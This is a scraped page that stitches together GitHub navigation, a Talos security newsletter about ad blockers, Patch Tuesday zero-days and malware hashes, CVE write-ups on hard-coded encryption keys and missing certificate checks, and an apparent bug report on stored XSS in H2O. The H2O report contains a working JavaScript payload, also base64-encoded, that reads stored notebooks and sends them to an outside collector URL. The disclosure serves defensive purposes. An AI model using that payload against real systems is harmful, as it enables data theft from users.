nagayama_copabowl Line 13.6.1 is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48134: CVE-reports/nagayama_copabowl.md at main · syz913/CVE-reports

YouTube’s new rules may not be around for long anyway, because they might run afoul of European Union regulations

Thursday, November 16, 2023 14:00

I don’t think this is a particularly bold take — but I’m not afraid to say that ad blockers are good! 

Ever since I started using one sometime in 2016, my experience of using the internet has improved exponentially. I can finally easily find a recipe for dinner on a random influencer’s blog, get a faster answer to “how to replace my car’s headlights” and likely avoid hundreds of pieces of malvertising. 

But their use has increasingly come into question with YouTube’s new policies on preventing users from using ad blockers on its site, with new warnings saying the user has a certain number of videos they can watch before they must allowlist youtube.com in their ad blocker, thus allowing the site to display ads before YouTube videos. 

The second this popped up for me two weeks ago, I immediately started researching workarounds and quickly found a secure solution that works for my browsing habits. The easy explanation for why Google (YouTube’s parent company) wants to get rid of ad blockers is, simply, money. They run the Google Ads service that provides the stereotypical ads everyone has been used to seeing on websites since the early aughts. Unfortunately, bad actors will often use enticing headlines, fake images or sales pitches to trick people into clicking on links that lead to malicious sites, attacker-run scams or downloads that are malware. 

Ad blockers are a major tool users can deploy to block this type of threat, so the explanation for why everyone should be using one is also clear. 

Google isn’t the only major company looking to bypass ad blockers, either. Spotify’s terms of service explicitly outlaws “circumventing or blocking advertisements or creating or distributing tools designed to block advertisements” on its platforms, and many news websites like CNBC have warnings about turning off your ad blocker before you can proceed to read an article. 

I am all for publishers charging for their content or putting it behind a paywall, or even “premium” subscriptions to disable ads from podcasts or videos. But we all need to universally agree that ad blockers (at least legitimate ones) are good for the internet at large and keep users safer. The FBI and CIA agree with me on this and have both advised that users enable ad blockers in web browsers before.

The argument that ads benefit the creators, and therefore we’re robbing them of money, is largely off-base from these corporations. 

Creators who are part of the YouTube Partner program, which means they have filled out an application and meet a minimum standard for views and subscribers, make between $1.61 and $29.30 for every 1,000 views on their videos through YouTube’s ads. So Mr. Beast might make a decent payday out of that every month, but I’m sure Mr. Beast would also be doing just fine without the extra few thousand dollars in his pocket currently. 

The people who are just trying to be helpful by showing me how to fix my washing machine or install a car seat properly are likely not missing my singular ad view when I use an ad blocker.  

Thankfully, YouTube’s new rules may not be around for long anyway, because they might run afoul of European Union regulations, and privacy advocates have already filed a formal challenge to the EU’s independent data regulator.  

**The one big thing **

Microsoft disclosed three zero-day vulnerabilities as part of its monthly security update this week, and all three have already been added to CISA’s Known Exploited Vulnerabilities catalog. However, Patch Tuesday only included three critical vulnerabilities, an unusually small number based on previous months’ Patch Tuesdays. CVE-2023-36033 is an elevation of privilege vulnerability in the Windows DWM Core Library that could allow an attacker to gain SYSTEM-level privileges. According to Microsoft, this vulnerability has already been exploited in the wild and there is proof-of-concept code available. Another zero-day elevation of privilege vulnerability, CVE-2023-36036, exists in the Windows Cloud Files mini-filter driver that could also allow an attacker to gain SYSTEM privileges. 

**Why do I care? **

Unfortunately, zero-days have become commonplace for Patch Tuesdays this year, and it seems like a few more pop up each month. In these cases, attackers were able to discover the exploits before Microsoft had a chance to patch them, and CISA already acknowledged that attackers are exploiting these vulnerabilities in the wild.  

**So now what? **

All Microsoft users should ensure their updates are installed correctly if you have auto-update on, or make sure to manually download the patches as soon as possible otherwise. The Talos blog also has a rundown of Snort rules that can detect the exploitation of many of the vulnerabilities Microsoft disclosed this week. 

**Top security headlines of the week **

**U.S. intelligence agencies are warning that the Royal ransomware group could soon be headed for a rebrand and may already be operating under the name “BlackSuit.”** Government sanctions have previously limited Royal’s ability to make money off their ransomware attacks, but new research from private firms and government agencies indicate that Royal may be connected to BlackSuit, another threat actor that uses similar open-source tools. Royal is a prolific ransomware group that the FBI says is responsible for infecting more than 350 companies, generating revenue in excess of $275 million. Security researchers are also speculating that Royal may have formed from the splintering of the former Conti ransomware gang, which was also the victim of sanctions and government takedown efforts. The U.S. and U.K. announced sanctions against 11 individuals believed to be a part of Conti in September. (TechCrunch, The Register) 

**Fighting election misinformation has only gotten more difficult since the 2020 presidential election.** New reporting and testimony indicate that many key programs and partnerships dedicated to fighting fake news and disinformation online have eroded over the past few years after political attacks from right-wing leaders and organizations. FBI Director Chris Wray told a Senate committee last week that an alliance of federal agencies, tech companies, election officials and security researchers dedicated to fighting foreign propaganda has fallen apart recently, with little to no communication between the various parties involved. Other officials in charge of fighting election disinformation say its been months since they heard from the FBI after once connecting with the agency regularly about fighting fake news on social media platforms. Additionally, many poll workers and election officials are afraid to discuss the topic after years of online pushback from right-wing voters who view the word “misinformation” as a synonym for censorship. (NBC News, NPR) 

**Chip makers Intel and AMD disclosed new vulnerabilities this week that could lead to privilege escalation.** Some Intel CPUs are vulnerable to the newly discovered “Reptar” vulnerability (CVE-2023-23583) that was disclosed on Tuesday. Adversaries can exploit this high-severity flaw if they already have access to the targeted system, eventually causing a crash on the machine leading to privilege escalation or the disclosure of sensitive system information. Another attack on AMD CPUs called “CacheWarp” could allow an attacker to infiltrate encrypted virtual machines and perform privilege escalation. This vulnerability, identified as CVE-2023-20592, affects AMD's Secure Encrypted Virtualization (SEV) technology. Users do not need to take any additional actions to address these vulnerabilities other than ensuring drivers and operating systems are up-to-date and patched. (SecurityWeek, The Hacker News) 

**Can’t get enough Talos? **

Rather than putting a bunch of links here this week, I instead encourage you to watch this whole segment from Fox 11 in Los Angeles, featuring Nick Biasini from Talos Outreach. The story covers online scams, but features Nick discussing Talos’ recent research into various scams in the online video game “Roblox.” 

**Upcoming events where you can find Talos **

**misecCON** **(Nov. 17)** 

_Lansing, Michigan_ 

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._ 

**"Power of the Platform” by Cisco** **(Dec. 5 & 7)** 

_Virtual (Please note: This presentation will only be given in German)_ 

> _The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you._  

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** b9ddbd1a4cec61e6b022a275d66312b5b676f9a0a9537a7708de9aa8ce34de59   
**MD5:** 3b100bdcd61bb1da816cd7eaf9ef13ba   
**Typical Filename:** vt-upload-C6In1   
**Claimed Product:** N/A    
**Detection Name:** Backdoor:KillAV-tpd 

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a   
**MD5:** 200206279107f4a2bb1832e3fcd7d64c   
**Typical Filename:** lsgkozfm.bat   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

We all just need to agree that ad blockers are good

MLflow allowed arbitrary files to be PUT onto the server.

**MLflow allowed arbitrary files to be PUT onto the server**

Critical severity GitHub Reviewed Published Nov 16, 2023 to the GitHub Advisory Database • Updated Nov 16, 2023

GHSA-f798-qm4r-23r5: MLflow allowed arbitrary files to be PUT onto the server

Missing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.

**HTTPie allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack**

Moderate severity GitHub Reviewed Published Nov 16, 2023 to the GitHub Advisory Database • Updated Nov 16, 2023

GHSA-8r96-8889-qg2x: HTTPie allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack

PyPinkSign v0.5.1 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption. This vulnerability can lead to the disclosure of information and communications.

**PyPinkSign uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption**

Moderate severity GitHub Reviewed Published Nov 16, 2023 to the GitHub Advisory Database • Updated Nov 17, 2023

GHSA-fxff-wxxv-c2jc: PyPinkSign uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption

Archery v1.10.0 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption. This vulnerability can lead to the disclosure of information and communications.

\# Cryptographic API Misuse Vulnerability in Archery v1.10.0 - Do not use constant key for encryption - Do not use non-random/static predictable IVs in CBC ### Description: In the Archery v1.10.0 , it is a SQL audit query platform. - It uses a hard-coded, constant key for encryption operations, which is a security risk as it makes encrypted data susceptible to being decrypted by anyone who has access to the source code or the constant key itself. \`salt=eCcGFZQj6PNoSSma31LR39rTzTbLkU8E\` - It utilizes a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encryption. Using predictable IVs can lead to vulnerabilities like the disclosure of information about the plaintext of subsequent messages. \`IV=0000000000000000\` ### Affected Version v1.10.0 ### Location: https://github.com/hhyo/Archery/blob/master/common/utils/aes\_decryptor.py#L7 https://github.com/hhyo/Archery/blob/master/common/utils/aes\_decryptor.py#L13 https://github.com/hhyo/Archery/blob/master/common/utils/aes\_decryptor.py#L33 ### Reference - CWE-259: Use of Hard-coded Password - CWE-329: Generation of Predictable IV with CBC Mode - CWE-330: Use of Insufficiently Random Values ### Expected Behavior: - The encryption key should be random , generated dynamically and stored securely. - The IV for CBC mode should be random and unpredictable for each encryption operation to ensure the security of the encryption scheme. ### Actual Behavior: - The code uses a constant key for encryption which is visible and accessible to anyone who examines the code. \`salt=eCcGFZQj6PNoSSma31LR39rTzTbLkU8E\` - A static IV is used across encryption operations, making the encrypted data less secure and potentially leading to patterns that can be exploited by attackers. \`IV=0000000000000000\` ### Recommendation: 1. Implement a secure method to generate a encryption key for each user or session, and store it using secure storage mechanisms. 2. Modify the encryption process to generate a random IV each time an encryption operation is performed. Addressing these issues is critical to maintaining the confidentiality and integrity of the data processed by Archery. It is recommended to take immediate action to correct these vulnerabilities and prevent potential exploits.

CVE-2023-48053

SuperAGI v0.0.13 was discovered to use a hardcoded key for encryption operations. This vulnerability can lead to the disclosure of information and communications.

\# Cryptographic API Misuse Vulnerability : Do not use constant key for encryption ### Description: In the SuperAGI v0.0.13,which is a A dev-first open source autonomous AI agent framework. It utilizes a constant default key to encryption sensitive data. This practice undermines the security of the encryption scheme by making it vulnerable to various attacks, as the key can be extracted from the source code and used to decrypt sensitive data. \`key = b'e3mp0E0Jr3jnVb96A31\_lKzGZlSTPIp4-rPaVseyn58='\` ### Affected Version \[v0.0.13\](https://github.com/TransformerOptimus/SuperAGI/releases/tag/v0.0.13) ### Location: - https://github.com/TransformerOptimus/SuperAGI/blob/4afbd7c04e368c7ed6c07fc0956f80b7a93ced19/superagi/helper/encyption\_helper.py#L5 - https://github.com/TransformerOptimus/SuperAGI/blob/4afbd7c04e368c7ed6c07fc0956f80b7a93ced19/superagi/helper/encyption\_helper.py#L7 - https://github.com/TransformerOptimus/SuperAGI/blob/4afbd7c04e368c7ed6c07fc0956f80b7a93ced19/superagi/helper/encyption\_helper.py#L39 ### Reference - CWE-326: Inadequate Encryption Strength - CWE-259: Use of Hard-coded Password ### Expected Behavior: Encryption keys should be dynamically generated, securely managed, and should remain confidential to ensure the security of encrypted data. Ideally, the keys would be stored in a secure environment or retrieved from a secure key management service. ### Actual Behavior: - https://github.com/TransformerOptimus/SuperAGI/blob/4afbd7c04e368c7ed6c07fc0956f80b7a93ced19/superagi/controllers/config.py#L69 - https://github.com/TransformerOptimus/SuperAGI/blob/4afbd7c04e368c7ed6c07fc0956f80b7a93ced19/superagi/models/models\_config.py#L83 It use constant key function to encrypt the API key for configuration, as indicated in the referenced code snippets. \`key = b'e3mp0E0Jr3jnVb96A31\_lKzGZlSTPIp4-rPaVseyn58='\` This allows anyone with access to the codebase to easily compromise the encryption and decrypt any data encrypted with this key. ### Recommendation - Do not use constant key for encryption - Implement a process for securely generating and rotating encryption keys regularly - Use a secure key management system to store the encryption keys outside of the codebase It's imperative to resolve this vulnerability to protect the data integrity and privacy of users of the SuperAGI framework. An immediate fix and release are recommended.

CVE-2023-48055

Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.

\# Cryptographic API Misuse Vulnerability : Missing SSL Certificate Validation > Do not use unverified hostname or certificates in connection ### Description: In the localstack v 2.3.2 there are sections where SSL certificate validation appears to be missing. Proper SSL certificate validation is a cornerstone of secure communication over HTTPS, and its absence can lead to severe security risks such as Man-In-The-Middle (MITM) attacks. In particular, the code does not enforce hostname verification or certificate validation. ### Affected Version v2.3.2 ### Location: https://github.com/localstack/localstack/blob/master/localstack/services/opensearch/cluster.py#L396 https://github.com/localstack/localstack/blob/master/localstack/services/opensearch/cluster.py#L56 ### Reference - CWE-295: Improper Certificate Validation - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor - CWE-319: Cleartext Transmission of Sensitive Information ### Expected Behavior: The expected behavior for any HTTPS connection is that the client should validate the SSL certificate provided by the server to ensure it is trusted, not expired, and matches the requested hostname. ### Actual Behavior: The actual behavior observed in the code indicates that SSL certificate validation may not be properly enforced. ### Recommendation - Set get request \`verify=True\` ,it will do ssl certificate validation. Due to the sensitive nature of data transmitted over HTTPS, it is imperative to address this vulnerability promptly to maintain the integrity and confidentiality of communication for users.

CVE-2023-48054

\# Cryptographic API Misuse Vulnerability : Missing SSL Certificate Validation Do not use unverified hostname or certificates in connection Do not disable HTTPS warnings ### Description: In the HTTPie 3.2.2 , there are sections where SSL certificate validation appears to be missing. Proper SSL certificate validation is a cornerstone of secure communication over HTTPS, and its absence can lead to severe security risks such as Man-In-The-Middle (MITM) attacks. In particular, the code does not enforce hostname verification or certificate validation, and it may also be suppressing HTTPS-related warnings that would typically alert a user to a potential security issue. ### Affected Version v3.2.2 ### Location: https://github.com/httpie/cli/blob/master/httpie/internal/update\_warnings.py#L44 https://github.com/httpie/cli/blob/master/httpie/client.py#L33 ### Reference - CWE-295: Improper Certificate Validation - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor - CWE-319: Cleartext Transmission of Sensitive Information ### Expected Behavior: The expected behavior for any HTTPS connection is that the client should validate the SSL certificate provided by the server to ensure it is trusted, not expired, and matches the requested hostname. Additionally, any HTTPS warnings should be displayed to the user, rather than being disabled, to avoid security oversights. ### Actual Behavior: The actual behavior observed in the code indicates that SSL certificate validation may not be properly enforced. Furthermore, HTTPS warnings that are essential for debugging and security awareness are not displayed, potentially causing the users to remain unaware of misconfigured or insecure SSL implementations. ### Recommendation - Do not use \`urllib3.disable\_warnings()\` to close tls warning , it is so dangerous! Please delete it. - Set get request \`verify=True\` ,it will do ssl certificate validation. Due to the sensitive nature of data transmitted over HTTPS, it is imperative to address this vulnerability promptly to maintain the integrity and confidentiality of client-server communication for HTTPie users.

CVE-2023-48052

H2O is vulnerable to stored XSS vulnerability which can lead to a Local File Include attack.

**Description**

In h2o-3, the data of all open Flows can be leaked or tampered with through Stored XSS vulnerability, and information can be modified or read in the model.

**Proof of Concept**

    hijack = (data) => {
        window.open(`https://b89f8f617e7792dc04cbdf2efbd5e0c9.m.pipedream.net/?data=${data}`)
    }
    flows_data = '';
    flows_name = [];
    fetch('http://localhost:54321/3/NodePersistentStorage/notebook')
        .then((x) => x.text())
        .then((x) => flows_data = JSON.parse(x))
        .then(() => {
            for(i = 0; i < flows_data['entries'].length; i++){
                flows_name.push(flows_data['entries'][i]['name'])
            }
        })
        .then(() => {
            for(i = 0; i < flows_name.length; i++){
                fetch(`http://localhost:54321/3/NodePersistentStorage/notebook/${flows_name[i]}`)
                    .then((x) => x.text())
                    .then((x) => hijack(x))
            }
        })
    
    // aGlqYWNrID0gKGRhdGEpID0+IHsKICAgIHdpbmRvdy5vcGVuKGBodHRwczovL2I4OWY4ZjYxN2U3NzkyZGMwNGNiZGYyZWZiZDVlMGM5Lm0ucGlwZWRyZWFtLm5ldC8/ZGF0YT0ke2RhdGF9YCkKfQpmbG93c19kYXRhID0gJyc7CmZsb3dzX25hbWUgPSBbXTsKZmV0Y2goJ2h0dHA6Ly9sb2NhbGhvc3Q6NTQzMjEvMy9Ob2RlUGVyc2lzdGVudFN0b3JhZ2Uvbm90ZWJvb2snKQogICAgLnRoZW4oKHgpID0+IHgudGV4dCgpKQogICAgLnRoZW4oKHgpID0+IGZsb3dzX2RhdGEgPSBKU09OLnBhcnNlKHgpKQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX2RhdGFbJ2VudHJpZXMnXS5sZW5ndGg7IGkrKyl7CiAgICAgICAgICAgIGZsb3dzX25hbWUucHVzaChmbG93c19kYXRhWydlbnRyaWVzJ11baV1bJ25hbWUnXSkKICAgICAgICB9CiAgICB9KQogICAgLnRoZW4oKCkgPT4gewogICAgICAgIGZvcihpID0gMDsgaSA8IGZsb3dzX25hbWUubGVuZ3RoOyBpKyspewogICAgICAgICAgICBmZXRjaChgaHR0cDovL2xvY2FsaG9zdDo1NDMyMS8zL05vZGVQZXJzaXN0ZW50U3RvcmFnZS9ub3RlYm9vay8ke2Zsb3dzX25hbWVbaV19YCkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiB4LnRleHQoKSkKICAgICAgICAgICAgICAgIC50aGVuKCh4KSA9PiBoaWphY2soeCkpCiAgICAgICAgfQogICAgfSk=
    

The payload leaking data from all Flows is as above. To use it without any error, you need to base64 encode it.

**How to build**

    # Build H2O
    git clone https://github.com/h2oai/h2o-3.git
    cd h2o-3
    ./gradlew build -x test
    
    You may encounter problems: e.g. npm missing. Install it:
    brew install npm
    
    # Start H2O
    java -jar build/h2o.jar
    
    # Point browser to http://localhost:54321
    

**Step to Reproduce**

1.  Go to http://localhost:54321/flow/index.html
2.  Open the same file : Sample Data.flow
3.  Open the poc file : leak_poc.flow
4.  Click the play button on flows of leak\_poc

**Poc File**

https://drive.google.com/drive/folders/1yINoutLUbj2-kpJHsqiGPxz7jkpBI4MX?usp=sharing

All PoCs and videos can be found on Google Drive above.

**Impact**

All data in this service can be tampered with or leaked without user's permission.

**Occurrences**

Tag

#git